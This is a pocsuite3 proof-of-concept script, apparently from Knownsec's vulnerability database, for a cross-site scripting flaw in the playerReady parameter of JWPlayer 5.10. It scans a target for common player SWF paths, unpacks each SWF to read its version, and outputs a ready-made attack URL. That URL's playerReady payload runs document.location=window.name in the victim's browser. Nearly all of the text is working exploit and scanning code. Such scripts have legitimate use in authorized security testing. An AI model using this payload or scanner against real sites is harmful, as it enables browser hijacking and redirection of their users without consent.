JWPlayer 5.10 playerReady 跨站脚本漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import struct import zlib import re from urllib import request class DemoPOC(POCBase): vulID = '0963' # ssvid version = '1' author = ['pnig0s@ Knownsec', 'chenghs@knownsec.com'] vulDate = '2013-04-16' createDate = '2013-04-17' updateDate = '2013-04-17' references = ['http://www.freebuf.com/articles/web/8705.html'] name = 'JWPlayer 5.10 playerReady 跨站脚本漏洞' appPowerLink = 'http://www.longtailvideo.com/' appName = 'JWPlayer' appVersion = '5.10#' vulType = 'Cross Site Scripting' desc = '''问题主要是因为之前一个XSS漏洞没有修复完全，导致bypass再利用。原始的问题是playerReady参数值未做过滤直接进入ExternalInterface.call导致可以执行任意JS代码。''' samples = [] install_requires = [''] def parse(self, swf_file): input = swf_file # swf文件名 need_close = False if hasattr(input, 'read'): # input.seek(0) pass else: input = open(input, 'rb') need_close = True def read_ui8(c): return struct.unpack('<B', c)[0] def read_ui16(c): return struct.unpack('<H', c)[0] def read_ui32(c): return struct.unpack('<I', c)[0] header = {} # Read the 3-byte signature field ff = input.read(3) signature = ''.join(map(lambda x:x.decode(), struct.unpack('<3c', ff))) # signature = struct.unpack('<3c',ff) if signature not in ('FWS', 'CWS'): raise ValueError('Invalid SWF signature: %s' % signature) # Compression header['compressed'] = signature.startswith('C') # Version header['version'] = read_ui8(input.read(1)) # File size (stored as a 32-bit integer) header['size'] = read_ui32(input.read(4)) # Payload buffer = input.read(header['size']) if header['compressed']: # Unpack the zlib compression de_buffer = buffer = zlib.decompress(buffer) return de_buffer def _verify(self): payloads = ['/player.swf', '/jwplayer.swf', '/play.swf', '/swf/player.swf'] result = {} for path in payloads: payload = self.url + path try: contentType = requests.get(payload).headers.get("Content-Type") except: contentType = '' if contentType == "application/x-shockwave-flash": r = request.urlopen(payload) swf = self.parse(r).decode('utf-8','ignore') m = re.findall('_version.*?([\d\.]+)', swf) if m: version = m[0].split('.') if int(version[0]) == 5 and "jwplayer" in swf: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = payload + '?playerReady=document.location=window.name%2b%27//%27%2b' result["VerifyInfo"]['Version'] = m[0] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)